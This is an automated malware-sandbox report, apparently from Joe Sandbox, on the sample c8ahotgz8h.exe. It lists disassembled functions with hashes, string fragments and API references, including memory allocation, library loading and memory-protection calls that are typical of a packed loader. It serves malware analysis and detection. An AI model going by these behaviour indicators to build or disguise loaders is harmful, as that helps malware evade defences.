String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: b270a9238801003effba3a3ec42bfcd40f2c6005311deedf64845f4667e33a57
Instruction ID: 6acc59803fb438b1d8a8a30e5f497692ab0d3d6e7c87e4b27a94052bdd9c196c
Opcode Fuzzy Hash: b270a9238801003effba3a3ec42bfcd40f2c6005311deedf64845f4667e33a57
Instruction Fuzzy Hash: 7D31E376A00361EBD7109F59C8E0AAA77B6FFC4B10F24465DE911AB340E770AD46CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1E9EF8B0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA4E51F

Strings

HEAP[%wZ]: , xrefs: 1EA4E490
HEAP: , xrefs: 1EA4E49D
(HeapHandle != NULL), xrefs: 1EA4E4A8

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: e672b152b09586591e5660eaa5524e085b9eca4aeaf5347d056d18abeac5eec0
Instruction ID: 30807ad5d154dc69b6a21518c715891d93ebc2227297393776059818da11893d
Opcode Fuzzy Hash: e672b152b09586591e5660eaa5524e085b9eca4aeaf5347d056d18abeac5eec0
Instruction Fuzzy Hash: 8691E975604791AFC317CB24C950B2AB79ABF84600F144B5EFA819FA81DB34EC85CF96

Uniqueness

Uniqueness Score: -1.00%

Function 1EA10AEB, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA10BFC

Strings

LdrpCheckModule, xrefs: 1EA59F24
Failed to allocated memory for shimmed module list, xrefs: 1EA59F1C
minkernel\ntdll\ldrinit.c, xrefs: 1EA59F2E

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 2a10b0dc8d4b90674b27fadffb39a6916b719161f38e8ae8c83c08bbc1a5ee82
Instruction ID: 991a9d7198f5c34f2f4537b7b294c0498fc562d99b9682551422e8a74e867182
Opcode Fuzzy Hash: 2a10b0dc8d4b90674b27fadffb39a6916b719161f38e8ae8c83c08bbc1a5ee82
Instruction Fuzzy Hash: 3571BF75A002559FCB04DF68C990AAEB7F5EF84308F18866DE805EF754E734AD42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 1EA19723, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA19922

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 1EA5DAFF
Unmapping DLL "%wZ", xrefs: 1EA5DAEE
LdrpUnloadNode, xrefs: 1EA5DAF5

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: 4358922a2668c61be6d06ae23e179259c0bcbd27403af1c70bf2845e627bdff1
Instruction ID: 62c0cc6e3b3398e910bf3adc7ef2c5691eacbbc55ddd8a82f8c9604f3a884fa7
Opcode Fuzzy Hash: 4358922a2668c61be6d06ae23e179259c0bcbd27403af1c70bf2845e627bdff1
Instruction Fuzzy Hash: 2F510335A103429FD714DF38CD80B6A77A6BF88714F180B2DE4529F695E730AC45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 1EA2C640, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA2C6DF

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 1EA680E9
Failed to reallocate the system dirs string !, xrefs: 1EA680E2
minkernel\ntdll\ldrinit.c, xrefs: 1EA680F3

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: b8648fac234a31ff2c598abc01a399f26289e2cc08a71d984185a96c0ea02edd
Instruction ID: 0e0ba420e59b19c9d1466a680fc6b3d556e5e7444392789fef761149abbb8d6f
Opcode Fuzzy Hash: b8648fac234a31ff2c598abc01a399f26289e2cc08a71d984185a96c0ea02edd
Instruction Fuzzy Hash: 1D41E4B5510391ABC724DB68DD80B5B77E9AF84750F005FAAF948AB250EB34EC01CB99

Uniqueness

Uniqueness Score: -1.00%

Function 1EA743D5, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA74489

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1EA74508
LdrpCheckRedirection, xrefs: 1EA7450F
minkernel\ntdll\ldrredirect.c, xrefs: 1EA74519

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 0a807c1bfce1dc989d53771283cc318263d81619c72f718d5f1399da38cb152e
Instruction ID: e2f30f17848e077be4e84c4bdb1b50c072fab23602cc5c18c34ad93932fcf682
Opcode Fuzzy Hash: 0a807c1bfce1dc989d53771283cc318263d81619c72f718d5f1399da38cb152e
Instruction Fuzzy Hash: DA41F332E146219FCB10CF59C940A56B7E7AF88650F060B6DED88EB355D732EC80DB99

Uniqueness

Uniqueness Score: -1.00%

Function 1EA75B90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA75C0F
RtlDebugPrintTimes.NTDLL ref: 1EA75C31
RtlDebugPrintTimes.NTDLL ref: 1EA75C3E

Strings

Wow64 Emulation Layer, xrefs: 1EA75C09

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: 27b60c312d7934ab0b762df0d23ffd8ce09196044395383c305a95c07572f43b
Instruction ID: 0e7c73413c10e5817109900ba7496af81462937e4a12bb0e641f47d7fdf95d95
Opcode Fuzzy Hash: 27b60c312d7934ab0b762df0d23ffd8ce09196044395383c305a95c07572f43b
Instruction Fuzzy Hash: AB212EB590025DBFAB059AA5CE84EFF7F7DEF44299B040658FA01A7100D731EE01DB69

Uniqueness

Uniqueness Score: -1.00%

Function 1EA1EE48, Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e6b3d2aeb963b103aeb0b5927edb34871b238fa00e5f1622160195889f192b
Instruction ID: 5a386ad6cc14de2cd0fde775477d6a8be0dc857acfd2da6158e960eb078fde71
Opcode Fuzzy Hash: f4e6b3d2aeb963b103aeb0b5927edb34871b238fa00e5f1622160195889f192b
Instruction Fuzzy Hash: E9E10779D00688DFCB24CFA9D980A9DBBF5FF58310F24462AE546AB364D731A881CF14

Uniqueness

Uniqueness Score: -1.00%

Function 1EA6EBD0, Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA6EC61
RtlDebugPrintTimes.NTDLL ref: 1EA6EC89
RtlDebugPrintTimes.NTDLL ref: 1EA6ED2C
RtlDebugPrintTimes.NTDLL ref: 1EA6EDE0

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 0624e124d6a7a7c4340a4b1d75eb3d7a8f8f0dbe3bafeffd42c80c22d40c2cd6
Instruction ID: 2f1b4ec35a791c54380208a1086e1ef34206ca72616c9bd0d8d4136da8ee895b
Opcode Fuzzy Hash: 0624e124d6a7a7c4340a4b1d75eb3d7a8f8f0dbe3bafeffd42c80c22d40c2cd6
Instruction Fuzzy Hash: 13712575E00229DFDF04CFA9C984BDDBBB5BF49314F14916AEA05BB244D734AA01CB98

Uniqueness

Uniqueness Score: -1.00%

Function 1EACA04A, Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EACA0F7
RtlDebugPrintTimes.NTDLL ref: 1EACA1AA
RtlDebugPrintTimes.NTDLL ref: 1EACA1CE
RtlDebugPrintTimes.NTDLL ref: 1EACA1E3

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: a2860afcca81daec0ffc3c04db429e4601b7875975c6caea96d35f0f2b84d019
Instruction ID: 4c65b14d41bd8e84e952d6fcf99649886d982f25dae6b63d9976b3375284fa56
Opcode Fuzzy Hash: a2860afcca81daec0ffc3c04db429e4601b7875975c6caea96d35f0f2b84d019
Instruction Fuzzy Hash: 79516B35710A12DFDB08CE19C8B4A29B7E2FB89350B25466DD90BDB724DB71ED41CB88

Uniqueness

Uniqueness Score: -1.00%

Function 1EA6EE56, Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA6EEED
RtlDebugPrintTimes.NTDLL ref: 1EA6EF12
RtlDebugPrintTimes.NTDLL ref: 1EA6EFA4
RtlDebugPrintTimes.NTDLL ref: 1EA6EFF8

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1e895ab484ebb2f19be71a23d60ea824cfb86a214b47371ed0f7a96b83626c2b
Instruction ID: ac3823031ace5bf41ae9b31dd17e8308863b93f83a7a03371cca65d9ab5817bc
Opcode Fuzzy Hash: 1e895ab484ebb2f19be71a23d60ea824cfb86a214b47371ed0f7a96b83626c2b
Instruction Fuzzy Hash: 8C5145B5E102189FDF08CF9AC844ADDBBF6BF49314F15822AE915BB250E7349A41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 1EA27A4F, Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA27A72
BaseThreadInitThunk.KERNEL32 ref: 1EA27A7C
RtlDebugPrintTimes.NTDLL ref: 1EA647F8
RtlDebugPrintTimes.NTDLL ref: 1EA6487B

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 6db64be77c2c6baa89e1bb799d0ecd717660a7b70d6ae1b1530a8fc818e57341
Instruction ID: 81aff5bd034c405c078bee165d6bc652650e0f2d4d00d80ef18cdf1738fa2c8c
Opcode Fuzzy Hash: 6db64be77c2c6baa89e1bb799d0ecd717660a7b70d6ae1b1530a8fc818e57341
Instruction Fuzzy Hash: 4F31E475E002689FCB05DFA8D984AAEBBF1BB4C720F14466AE511BB290DB356901CF58

Uniqueness

Uniqueness Score: -1.00%

Function 1E9F58E0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 1EA508AE

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 36372e94b6e8f61053158fccb0c819dd26df4286503022e4d5836da83b7f17cf
Instruction ID: 0d10728260772d43a7caec19baf297e2d20f02a907017f0592b2196e1c8f440d
Opcode Fuzzy Hash: 36372e94b6e8f61053158fccb0c819dd26df4286503022e4d5836da83b7f17cf
Instruction Fuzzy Hash: C9322474D042AADFDB21CF65C984BD9BBB5BF08304F0086E9D449A7281D7B5AE84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1EA24B79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 1EA24BE3
Flst, xrefs: 1EA24BB6

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: e3e3101acf8f884ddb8ff9af428de337590741e0d95f6cd297abf5d858b2ae85
Instruction ID: ae183ecb46e03408f7f2baf3bc3215f201651de08f64ebb54ecb68678c4c27ee
Opcode Fuzzy Hash: e3e3101acf8f884ddb8ff9af428de337590741e0d95f6cd297abf5d858b2ae85
Instruction Fuzzy Hash: C751CBB1E1069A8FCB14CF99C584759FBF6EF44B14F54823AD045AB244E7B09D86CB88

Uniqueness

Uniqueness Score: -1.00%

Function 1E9F0485, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9F05D6

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E9F0586
kLsE, xrefs: 1E9F05FE

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: db116d6639263c21a5f70c0a5c4f53bb334b5a28b622675e4c46bd348eb98589
Instruction ID: 6b60d138400e0d5c696f3fa32564a35c485b47bbc1e2da4a7ab089836f2ca550
Opcode Fuzzy Hash: db116d6639263c21a5f70c0a5c4f53bb334b5a28b622675e4c46bd348eb98589
Instruction Fuzzy Hash: AA51CFB1A10786DFCB14DFA6C4406ABBBFDAF44301F108A3ED59587241E7B4A905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E9EDF21, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9EDFE0

Strings

0, xrefs: 1E9EDFAB
0, xrefs: 1E9EDFC0

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: b93f66c5ad677032961d8f1613d4fe5357fcc1ade58c2698c9794cf30c9c841d
Instruction ID: 6559ccb392dd24455fead55d0d762e2c2cf76b0a2896e00d4636c4e63023cf62
Opcode Fuzzy Hash: b93f66c5ad677032961d8f1613d4fe5357fcc1ade58c2698c9794cf30c9c841d
Instruction Fuzzy Hash: 5D419FB56187429FC301CF28D544A1ABBE5BB88318F044A6EF588DB700D331EA45CF96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: c8ahotgz8h.exe PID: 2508 Parent PID: 7504 c8ahotgz8h.exeCOMMON

Executed Functions

Function 00570754, Relevance: 13.7, APIs: 1, Strings: 6, Instructions: 1433COMMON

Download Yara Rule

Strings

yW^g, xrefs: 00570D53
}#c, xrefs: 0056A819
yW^g, xrefs: 00570D58
H+m, xrefs: 0056A66D
U=b, xrefs: 0056B67C
Sm!|, xrefs: 00570800

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$Sm!|$U=b$yW^g$yW^g$}#c
API String ID: 1029625771-3546614695
Opcode ID: a994831db66d78b2093441fe9113e5f143bbfa255ab206bf9932e702806651c5
Instruction ID: d0a24021aa5a83e410dc14346b831975518b4d005ce0386654d94a0d83295bd7
Opcode Fuzzy Hash: a994831db66d78b2093441fe9113e5f143bbfa255ab206bf9932e702806651c5
Instruction Fuzzy Hash: 77B2357160434ADFDF349E38C9A57EA3BA2FF55390F95812EDC8A9B244D3348985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 005706A2, Relevance: 11.8, APIs: 1, Strings: 5, Instructions: 1270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

";Jm, xrefs: 0056BD2A
}#c, xrefs: 0056A819
H+m, xrefs: 0056A66D
U=b, xrefs: 0056B67C
EK], xrefs: 00561450

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: ";Jm$H+m$U=b$}#c$EK]
API String ID: 0-2571250244
Opcode ID: f9d2e81ba44d5965e827736770de22e66262a531534cc237cc2832ee5ebeaf67
Instruction ID: de7bc562adc1e8c29e232d2a8b7260b26451281c24de198095c5d92c0124658d
Opcode Fuzzy Hash: f9d2e81ba44d5965e827736770de22e66262a531534cc237cc2832ee5ebeaf67
Instruction Fuzzy Hash: 20A2447160434A9FDF349E38CDA57DA7BA2FF55350F59822EDC8A8B250D3358986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0056CE0C, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1452
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

}#c, xrefs: 0056A819
H+m, xrefs: 0056A66D
U=b, xrefs: 0056B67C
EK], xrefs: 00561450

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$U=b$}#c$EK]
API String ID: 1029625771-1197094480
Opcode ID: 82915853cc823b39f77a4ebf5ea4c2710b2b522bee9262211b365f458a48c437
Instruction ID: 2cbbea7bca7ffd11db10f875e6770a580d11d4af5b5b0b0b4772a5f387146c35
Opcode Fuzzy Hash: 82915853cc823b39f77a4ebf5ea4c2710b2b522bee9262211b365f458a48c437
Instruction Fuzzy Hash: 60C2357160434A9FDF349E34CDA57EE3BA2FF55390F95852ADC8A9B254D3308986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 00572AD2, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 305COMMON

Download Yara Rule

Strings

);J, xrefs: 00572D08
EK], xrefs: 00561450

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: );J$EK]
API String ID: 0-1158390361
Opcode ID: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
Instruction ID: 3f7655a3a4547983acea0519667cdc86175e01c8c82dee460008b03e70238bcf
Opcode Fuzzy Hash: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
Instruction Fuzzy Hash: DAB17C30A04349CFDF389E34D9A47EA3BA2FF55350F59851ACC8E8B655D7318A82EB01

Uniqueness

Uniqueness Score: -1.00%

Function 0056C88B, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242
memorylibrarynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(8D05082D,?,-00000001EF38FF1E), ref: 0056CBC8
LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6

Strings

U=b, xrefs: 0056B67C

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: U=b
API String ID: 2616484454-117013522
Opcode ID: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
Instruction ID: 3ef18e08b5a3f845fcd61d351520893dd6cedf6b16431fadf5f561777080bf1f
Opcode Fuzzy Hash: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
Instruction Fuzzy Hash: 45814B71A0035BDFDF349E689DA43EA3AB2BF95390F94413ADC899B254D7318E81CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00571161, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EK], xrefs: 00561450

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: EK]
API String ID: 0-1532622298
Opcode ID: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
Instruction ID: 7f2c824bc979e4107e2b7bf8adf9b110f1ab5535bc9a2088fec85385654fbe56
Opcode Fuzzy Hash: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
Instruction Fuzzy Hash: AE61AC71A003499FDF359E7489A43DB3BA6FF963A0F65492ADC46CB701D7318986C701

Uniqueness

Uniqueness Score: -1.00%

Function 0056FFED, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`, xrefs: 005701E0

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
Instruction ID: f0051739ee9f5ead7fa6c460bb19291342acc587674e0e2bcc116909637407d5
Opcode Fuzzy Hash: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
Instruction Fuzzy Hash: ED516B76A0035ADBCF345E299E683DA37A2FFE13A0FDA402ACC4E97201C7304985D741

Uniqueness

Uniqueness Score: -1.00%

Function 00563CE1, Relevance: 1.6, APIs: 1, Instructions: 138
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 00563DAF

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 3bfab089e0a8e921a3d477f1633c910392c34ba205763c3e8f51b3710357ae60
Instruction ID: 815a7e42fffba584ecc8aa1ab58a73cedfe24da399ac82aa319bdbcc8ef843ff
Opcode Fuzzy Hash: 3bfab089e0a8e921a3d477f1633c910392c34ba205763c3e8f51b3710357ae60
Instruction Fuzzy Hash: 8041CC715083828FDB159E3489683EA3FD5AF613A0F694B6EC866CB5D2C7368903C701

Uniqueness

Uniqueness Score: -1.00%

Function 00563E0E, Relevance: 1.6, APIs: 1, Instructions: 65
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 00563DAF

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 5a26d430a2d090a820bf4f5314116ffd24961de1c209c8b2da92f1e55e77e4ed
Instruction ID: 23d7aa219f351d074db8552830d230c8a808649600816b93fb4f1542e1a3ca84
